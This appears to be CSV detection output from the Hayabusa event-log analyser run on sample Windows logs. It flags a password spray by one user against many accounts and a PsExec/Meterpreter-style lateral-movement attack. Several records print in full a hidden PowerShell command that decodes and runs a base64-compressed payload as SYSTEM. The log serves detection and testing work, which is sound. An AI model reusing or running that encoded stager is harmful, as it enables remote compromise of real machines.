2019-05-01 04:31:44.208 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: rbowes | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:31:45.284 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: ebooth | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:31:46.379 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: cfleener | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:31:47.433 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: cmoody | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:31:48.512 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: psmith | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:31:49.576 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: jkulikowski | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:31:50.656 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: gsalinas | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:31:51.729 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: tbennett | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:31:52.823 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: econrad | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:31:53.886 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: smisenar | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:31:54.942 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: jleytevidal | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:31:56.019 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: lpesce | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:31:57.107 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: sanson | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:31:58.193 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: sarmstrong | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:31:59.253 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: wstrzelec | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:32:00.320 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: zmathis | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:32:01.393 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: melliott | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:32:02.451 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: kperryman | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:32:03.525 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: jorchilles | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:32:03.525 +09:00,-,-,medium,CredAccess,Password Spray,[condition] count(TargetUserName) by IpAddress >= 5 in timeframe [result] count:14 TargetUserName:drook/bgalbraith/edygert/jorchilles/bking/jlake/mdouglas/cspizor/bgreenwood/smisenar/ssims/cragoso/dmashburn/baker IpAddress:172.16.144.128 timeframe:5m,rules/hayabusa/default/alerts/Security/4648_BruteForce_PasswordSprayDetect.yml,-
2019-05-01 04:32:04.597 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: jlake | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:32:05.675 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: edygert | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:32:06.738 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: drook | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:32:07.835 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: dmashburn | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:32:08.911 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: cspizor | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:32:09.973 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: cragoso | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:32:11.051 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: bgalbraith | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:32:12.146 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: bking | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:32:13.221 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: mdouglas | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:32:14.281 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: bgreenwood | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:32:15.352 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: baker | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:32:16.402 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: ssims | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:32:17.474 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: smisenar | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 05:26:51.793 +09:00,IEWIN7,18,info,,Pipe Connected,\ntsvcs | Process: System | PID: 4 | PGUID: 365ABB72-2584-5CC9-0000-0010EA030000,rules/hayabusa/sysmon/events/18_PipeConnected.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_psexec_smb_meterpreter.evtx
2019-05-01 05:26:51.981 +09:00,IEWIN7,13,high,Exec,PowerShell as a Service in Registry,,rules/sigma/registry_event/sysmon_powershell_as_service.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_psexec_smb_meterpreter.evtx
2019-05-01 05:26:51.981 +09:00,IEWIN7,13,critical,Exec | PrivEsc | LatMov,CobaltStrike Service Installations in Registry,,rules/sigma/registry_event/sysmon_cobaltstrike_service_installs.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_psexec_smb_meterpreter.evtx
2019-05-01 05:26:52.090 +09:00,IEWIN7,1,info,,Process Created,"Cmd: C:\Windows\system32\cmd.exe /b /c start /b /min powershell.exe -nop -w hidden -noni -c ""if([IntPtr]::Size -eq 4){$b='powershell.exe'}else{$b=$env:windir+'\syswow64\WindowsPowerShell\v1.0\powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-noni -nop -w hidden -c &([scriptblock]::create((New-Object IO.StreamReader(New-Object IO.Compression.GzipStream((New-Object IO.MemoryStream(,[Convert]::FromBase64String(''H4sIAIuvyFwCA7VW+2/aSBD+OZH6P1gVErZCMA60aSJVujVPE5xADITHodNir+0lay/Ya169/u83Btym1/SuPeksHruzM7Mz33w7azcJbUF5KM2DxU1J+vTm/KyLIxxIco6MClKOmsrZGQhz5Er6KMlTtFzWeIBpOLu9rSZRREJxnBebRKA4JsGcURLLivSn9OSTiFw+zBfEFtInKfdHscn4HLOT2q6KbZ9Ilyh00rUOt3EaSdFaMirk/O+/55XppTYr1lcJZrGct3axIEHRYSyvSJ+VdMP+bknkvEntiMfcFcUnGpavioMwxi65B29rYhLhcyfOK5ADfCIikiiUIJvU/Lgo52HYjbiNHCcicZwvSNPU8XQ2+02ennZ9TEJBA1I0QkEivrRItKY2iYstHDqMPBJ3BlaWiGjozRQF1Nb8mci5MGGsIP2KG/mebDLMftZIfmkEWl0RKYW0gn/P0uROwsjRLv9KmFBzBZ5j3QGyz2/O35y7GUVWdyP6kiEwOpsexgQCk7s8pge9j1KpIJmwCRY82sE0148Sosy+wCrl3Gbhx9ZapgqKfP+0BdF0yKkzA5NTHXMbkUp/zMYacWlIarsQB9TOCCe/Bi5xGTnkV8zU7iEkOX9aIE6NMOJhkQKW1vg7s3pAxRdbPaHMIRGyoUAxRAW1U74N5lgDOW+EJgkAn+McSJdzgeYk0z5Re5ftns5BKV9lOI4LUjeBc2YXJItgRpyChMKYnpZQIvhhmP8arpkwQW0ci8zdTDmieNqtysNYRIkNBYPM+9aS2BSzFIiC1KIO0XcW9bJd86/CUMWMAfvB0xrKAJI0fUukNIicNLumUrSIMIIlIwFoHA57g2EPjvaJ4QfWYI84+W+jyxh8pGuKQpb+i9igtBbjoiANaSSgY6SIpuz5L1u/6BQQRDUipwLI2ZmY6juRMjm3H6c8PKFxyD0SkHcj4oGOY/K+cuwJ8lv1gVYRPGMjZKatP1MNbahmmPAd0LLBa9fOXXvRUqPa1neRERtmq1vrtVqVddsaVoRVN8Rd1xBmfbRYWKj1OBiLiYFafVp6Hlf2yzbdWx3kjLfq+72+35T07X7hOe645rretWs9au8atPNU7emlK9yp1ZPOk77RS5W4TjetHh30ntsNMR8PGR64qjfSbjDddqLFUOPm3kCo6ZftfdsdNn3T2Y1blCzUUof2UA+hO/txMGh6S68ZI/VmuKoG3h1CRh8jA9WHu/Y7pvcGDR0N6noPP/Bu+aKmahNnVW9MRrgdMKfZUrXxCDkoUvuer10/+GGKE/b0lZ7qoM5k11BBp1tBrcoV3U9WvaaH6qAzDDjCDfo8uBiBz/s+2DwNNIcjERojVR16qodcyx9jpIO2vkINnVd3H7pmVx0Or3xt/qz5EDMZrT+YbXTRsLuqql4Ec/hVkW0ut+FI31yvvZbF7/AdHq4nZVXrb5ouWqGLC13T56JVL7fXsG9fvRl8fJtyB8iTc/f+5AUvftTATRzFPmbAF+jN2cls8Khx6rhdTlMLWT5ezs8kCgmDCw6uwIzliDFup83+0Jzhojm2//Q2GsCwfPXqSJG+KCpfr4FMdHs7gTDh3OzHxQ4JPeEXSttyqQRdvbStlCDJn0+sypc7GRwV0jvhgMvRLzv4VdKzlPMfh1Hlf4brdIZ9+HP+Da6vsn9Y/SkIS4Vjyt+JvxX8EqK/nvsTpgJULehDjBxvv9chOJHjxYvBoTRQfff0pK91D4m4vIcXhjfnfwFhhx3MPQoAAA==''))),[IO.Compression.CompressionMode]::Decompress))).ReadToEnd()))';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s);"" | Process: C:\Windows\System32\cmd.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 3348 | PGUID: 365ABB72-AF8B-5CC8-0000-00101C1A1900",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_psexec_smb_meterpreter.evtx
2019-05-01 05:26:52.090 +09:00,IEWIN7,1,high,Exec,Suspicious PowerShell Parent Process,,rules/sigma/process_creation/proc_creation_win_susp_powershell_parent_process.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_psexec_smb_meterpreter.evtx
2019-05-01 05:26:52.090 +09:00,IEWIN7,1,high,,Suspicious SYSTEM User Process Creation,,rules/sigma/process_creation/proc_creation_win_susp_system_user_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_psexec_smb_meterpreter.evtx
2019-05-01 05:26:52.090 +09:00,IEWIN7,1,high,Evas,FromBase64String Command Line,,rules/sigma/process_creation/proc_creation_win_powershell_frombase64string.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_psexec_smb_meterpreter.evtx
2019-05-01 05:26:52.090 +09:00,IEWIN7,1,medium,CredAccess,Mimikatz Command Line,,rules/sigma/process_creation/proc_creation_win_mimikatz_command_line.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_psexec_smb_meterpreter.evtx
2019-05-01 05:26:52.090 +09:00,IEWIN7,1,high,PrivEsc,Abused Debug Privilege by Arbitrary Parent Processes,,rules/sigma/process_creation/proc_creation_win_abusing_debug_privilege.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_psexec_smb_meterpreter.evtx
2019-05-01 05:26:52.090 +09:00,IEWIN7,1,medium,Exec | C2,Curl Start Combination,,rules/sigma/process_creation/proc_creation_win_susp_curl_start_combo.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_psexec_smb_meterpreter.evtx
2019-05-01 05:26:52.090 +09:00,IEWIN7,1,medium,Exec,Too Long PowerShell Commandlines,,rules/sigma/process_creation/proc_creation_win_long_powershell_commandline.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_psexec_smb_meterpreter.evtx
2019-05-01 05:26:52.106 +09:00,IEWIN7,1,info,,Process Created,"Cmd: powershell.exe -nop -w hidden -noni -c ""if([IntPtr]::Size -eq 4){$b='powershell.exe'}else{$b=$env:windir+'\syswow64\WindowsPowerShell\v1.0\powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-noni -nop -w hidden -c &([scriptblock]::create((New-Object IO.StreamReader(New-Object IO.Compression.GzipStream((New-Object IO.MemoryStream(,[Convert]::FromBase64String(''H4sIAIuvyFwCA7VW+2/aSBD+OZH6P1gVErZCMA60aSJVujVPE5xADITHodNir+0lay/Ya169/u83Btym1/SuPeksHruzM7Mz33w7azcJbUF5KM2DxU1J+vTm/KyLIxxIco6MClKOmsrZGQhz5Er6KMlTtFzWeIBpOLu9rSZRREJxnBebRKA4JsGcURLLivSn9OSTiFw+zBfEFtInKfdHscn4HLOT2q6KbZ9Ilyh00rUOt3EaSdFaMirk/O+/55XppTYr1lcJZrGct3axIEHRYSyvSJ+VdMP+bknkvEntiMfcFcUnGpavioMwxi65B29rYhLhcyfOK5ADfCIikiiUIJvU/Lgo52HYjbiNHCcicZwvSNPU8XQ2+02ennZ9TEJBA1I0QkEivrRItKY2iYstHDqMPBJ3BlaWiGjozRQF1Nb8mci5MGGsIP2KG/mebDLMftZIfmkEWl0RKYW0gn/P0uROwsjRLv9KmFBzBZ5j3QGyz2/O35y7GUVWdyP6kiEwOpsexgQCk7s8pge9j1KpIJmwCRY82sE0148Sosy+wCrl3Gbhx9ZapgqKfP+0BdF0yKkzA5NTHXMbkUp/zMYacWlIarsQB9TOCCe/Bi5xGTnkV8zU7iEkOX9aIE6NMOJhkQKW1vg7s3pAxRdbPaHMIRGyoUAxRAW1U74N5lgDOW+EJgkAn+McSJdzgeYk0z5Re5ftns5BKV9lOI4LUjeBc2YXJItgRpyChMKYnpZQIvhhmP8arpkwQW0ci8zdTDmieNqtysNYRIkNBYPM+9aS2BSzFIiC1KIO0XcW9bJd86/CUMWMAfvB0xrKAJI0fUukNIicNLumUrSIMIIlIwFoHA57g2EPjvaJ4QfWYI84+W+jyxh8pGuKQpb+i9igtBbjoiANaSSgY6SIpuz5L1u/6BQQRDUipwLI2ZmY6juRMjm3H6c8PKFxyD0SkHcj4oGOY/K+cuwJ8lv1gVYRPGMjZKatP1MNbahmmPAd0LLBa9fOXXvRUqPa1neRERtmq1vrtVqVddsaVoRVN8Rd1xBmfbRYWKj1OBiLiYFafVp6Hlf2yzbdWx3kjLfq+72+35T07X7hOe645rretWs9au8atPNU7emlK9yp1ZPOk77RS5W4TjetHh30ntsNMR8PGR64qjfSbjDddqLFUOPm3kCo6ZftfdsdNn3T2Y1blCzUUof2UA+hO/txMGh6S68ZI/VmuKoG3h1CRh8jA9WHu/Y7pvcGDR0N6noPP/Bu+aKmahNnVW9MRrgdMKfZUrXxCDkoUvuer10/+GGKE/b0lZ7qoM5k11BBp1tBrcoV3U9WvaaH6qAzDDjCDfo8uBiBz/s+2DwNNIcjERojVR16qodcyx9jpIO2vkINnVd3H7pmVx0Or3xt/qz5EDMZrT+YbXTRsLuqql4Ec/hVkW0ut+FI31yvvZbF7/AdHq4nZVXrb5ouWqGLC13T56JVL7fXsG9fvRl8fJtyB8iTc/f+5AUvftTATRzFPmbAF+jN2cls8Khx6rhdTlMLWT5ezs8kCgmDCw6uwIzliDFup83+0Jzhojm2//Q2GsCwfPXqSJG+KCpfr4FMdHs7gTDh3OzHxQ4JPeEXSttyqQRdvbStlCDJn0+sypc7GRwV0jvhgMvRLzv4VdKzlPMfh1Hlf4brdIZ9+HP+Da6vsn9Y/SkIS4Vjyt+JvxX8EqK/nvsTpgJULehDjBxvv9chOJHjxYvBoTRQfff0pK91D4m4vIcXhjfnfwFhhx3MPQoAAA==''))),[IO.Compression.CompressionMode]::Decompress))).ReadToEnd()))';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s);"" | Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\cmd.exe /b /c start /b /min powershell.exe -nop -w hidden -noni -c ""if([IntPtr]::Size -eq 4){$b='powershell.exe'}else{$b=$env:windir+'\syswow64\WindowsPowerShell\v1.0\powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-noni -nop -w hidden -c &([scriptblock]::create((New-Object IO.StreamReader(New-Object IO.Compression.GzipStream((New-Object IO.MemoryStream(,[Convert]::FromBase64String(''H4sIAIuvyFwCA7VW+2/aSBD+OZH6P1gVErZCMA60aSJVujVPE5xADITHodNir+0lay/Ya169/u83Btym1/SuPeksHruzM7Mz33w7azcJbUF5KM2DxU1J+vTm/KyLIxxIco6MClKOmsrZGQhz5Er6KMlTtFzWeIBpOLu9rSZRREJxnBebRKA4JsGcURLLivSn9OSTiFw+zBfEFtInKfdHscn4HLOT2q6KbZ9Ilyh00rUOt3EaSdFaMirk/O+/55XppTYr1lcJZrGct3axIEHRYSyvSJ+VdMP+bknkvEntiMfcFcUnGpavioMwxi65B29rYhLhcyfOK5ADfCIikiiUIJvU/Lgo52HYjbiNHCcicZwvSNPU8XQ2+02ennZ9TEJBA1I0QkEivrRItKY2iYstHDqMPBJ3BlaWiGjozRQF1Nb8mci5MGGsIP2KG/mebDLMftZIfmkEWl0RKYW0gn/P0uROwsjRLv9KmFBzBZ5j3QGyz2/O35y7GUVWdyP6kiEwOpsexgQCk7s8pge9j1KpIJmwCRY82sE0148Sosy+wCrl3Gbhx9ZapgqKfP+0BdF0yKkzA5NTHXMbkUp/zMYacWlIarsQB9TOCCe/Bi5xGTnkV8zU7iEkOX9aIE6NMOJhkQKW1vg7s3pAxRdbPaHMIRGyoUAxRAW1U74N5lgDOW+EJgkAn+McSJdzgeYk0z5Re5ftns5BKV9lOI4LUjeBc2YXJItgRpyChMKYnpZQIvhhmP8arpkwQW0ci8zdTDmieNqtysNYRIkNBYPM+9aS2BSzFIiC1KIO0XcW9bJd86/CUMWMAfvB0xrKAJI0fUukNIicNLumUrSIMIIlIwFoHA57g2EPjvaJ4QfWYI84+W+jyxh8pGuKQpb+i9igtBbjoiANaSSgY6SIpuz5L1u/6BQQRDUipwLI2ZmY6juRMjm3H6c8PKFxyD0SkHcj4oGOY/K+cuwJ8lv1gVYRPGMjZKatP1MNbahmmPAd0LLBa9fOXXvRUqPa1neRERtmq1vrtVqVddsaVoRVN8Rd1xBmfbRYWKj1OBiLiYFafVp6Hlf2yzbdWx3kjLfq+72+35T07X7hOe645rretWs9au8atPNU7emlK9yp1ZPOk77RS5W4TjetHh30ntsNMR8PGR64qjfSbjDddqLFUOPm3kCo6ZftfdsdNn3T2Y1blCzUUof2UA+hO/txMGh6S68ZI/VmuKoG3h1CRh8jA9WHu/Y7pvcGDR0N6noPP/Bu+aKmahNnVW9MRrgdMKfZUrXxCDkoUvuer10/+GGKE/b0lZ7qoM5k11BBp1tBrcoV3U9WvaaH6qAzDDjCDfo8uBiBz/s+2DwNNIcjERojVR16qodcyx9jpIO2vkINnVd3H7pmVx0Or3xt/qz5EDMZrT+YbXTRsLuqql4Ec/hVkW0ut+FI31yvvZbF7/AdHq4nZVXrb5ouWqGLC13T56JVL7fXsG9fvRl8fJtyB8iTc/f+5AUvftTATRzFPmbAF+jN2cls8Khx6rhdTlMLWT5ezs8kCgmDCw6uwIzliDFup83+0Jzhojm2//Q2GsCwfPXqSJG+KCpfr4FMdHs7gTDh3OzHxQ4JPeEXSttyqQRdvbStlCDJn0+sypc7GRwV0jvhgMvRLzv4VdKzlPMfh1Hlf4brdIZ9+HP+Da6vsn9Y/SkIS4Vjyt+JvxX8EqK/nvsTpgJULehDjBxvv9chOJHjxYvBoTRQfff0pK91D4m4vIcXhjfnfwFhhx3MPQoAAA==''))),[IO.Compression.CompressionMode]::Decompress))).ReadToEnd()))';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s);"" | LID: 0x3e7 | PID: 3872 | PGUID: 365ABB72-AF8B-5CC8-0000-0010AC1B1900",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_psexec_smb_meterpreter.evtx
2019-05-01 05:26:52.106 +09:00,IEWIN7,1,high,,Suspicious SYSTEM User Process Creation,,rules/sigma/process_creation/proc_creation_win_susp_system_user_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_psexec_smb_meterpreter.evtx
2019-05-01 05:26:52.106 +09:00,IEWIN7,1,high,Evas,FromBase64String Command Line,,rules/sigma/process_creation/proc_creation_win_powershell_frombase64string.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_psexec_smb_meterpreter.evtx
2019-05-01 05:26:52.106 +09:00,IEWIN7,1,low,Exec,Non Interactive PowerShell,,rules/sigma/process_creation/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_psexec_smb_meterpreter.evtx
2019-05-01 05:26:52.106 +09:00,IEWIN7,1,medium,CredAccess,Mimikatz Command Line,,rules/sigma/process_creation/proc_creation_win_mimikatz_command_line.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_psexec_smb_meterpreter.evtx
2019-05-01 05:26:52.106 +09:00,IEWIN7,1,high,Evas | Exec,Suspicious PowerShell Command Line,,rules/sigma/process_creation/proc_creation_win_powershell_cmdline_special_characters.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_psexec_smb_meterpreter.evtx
